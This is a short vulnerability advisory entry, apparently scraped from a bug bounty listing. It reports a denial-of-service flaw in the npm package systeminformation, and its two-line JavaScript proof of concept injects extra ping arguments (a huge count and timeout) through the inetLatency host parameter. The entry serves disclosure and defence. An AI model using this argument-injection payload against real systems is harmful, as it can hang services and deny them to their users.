Lucene search

K
huntrEffectrenan1-NPM-SYSTEMINFORMATION
HistoryFeb 11, 2021 - 12:00 a.m.

Denial of Service in sebhildebrandt/systeminformation

2021-02-1100:00:00
effectrenan
www.huntr.dev
21
systeminformation
denial of service
ping command
parameter overwrite
bug bounty

EPSS

0.971

Percentile

99.8%

Description

systeminformation is vulnerable to Denial of Service.

It is possible to overwrite the ping command parameters, which results in too long execution.

Proof of Concept

Create a .js file with the content below and run it.

const si = require('systeminformation');
si.inetLatency("-c 10000000000 -w 999999999 effectrenan.com").then((a) => { console.log(a) })